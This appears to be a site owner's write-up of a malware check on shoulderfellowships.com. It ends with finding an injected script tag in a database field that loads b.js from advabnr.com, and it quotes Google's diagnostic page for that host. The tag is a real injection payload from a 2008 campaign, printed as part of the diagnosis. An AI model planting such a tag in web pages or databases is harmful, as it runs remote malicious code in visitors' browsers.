shoulderfellowships.com

We tested this site and didn't find any significant problems.

 

Next thing to check was Google Webmaster tools which has a malware reporting page. The results were:

 

Malware

Google has not detected any malware on this site.

 

Next, I decided to download the web logs to see if there were any sql injection attempts or other hacking methods that would be picked up in the weblogs. There was no evidence of any wrong doing there.

The last thing I tried was to load up the website and see if my antivirus picked anything up. There was nothing reported there either. Finally, I checked every single page of the site viewing the source code. One one page I found a script tag was added to a database field which linked was this:

<script src=http://www.advabnr.com/b.js></script>

This bit of code was the same one that had been used to attack the website back in August 2008, so it looks like it could have been hidden in the site since then and was not detected or might have been manually added to the database by a person who has registered for the website. The external script is not currently active, but some virus scanners still report a warning about the site.

If you google advabnr.com you get the 'this site may harm your computer message'. Click on that link and the google report says:

Safe Browsing

Diagnostic page for advabnr.com

What is the current listing status for advabnr.com?

Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?

Of the 1 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-10-17, and the last time suspicious content was found on this site was on 2011-10-17.

This site was hosted on 1 network(s) including AS21740 (ENOMAS1).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, advabnr.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 6 domain(s), including moph.go.th/, choongang.co.kr/, software-developers.net/.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

• Return to the previous page.
• If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

 

so it looks like even though google have found sqlinjection links to the site, there are no malicious scripts hosted on the site. if you google "http:/www.advabnr. com/b.js" you get 28,000 results which shows the extent of the infection. Most of these appear to have been added between june and october 2008.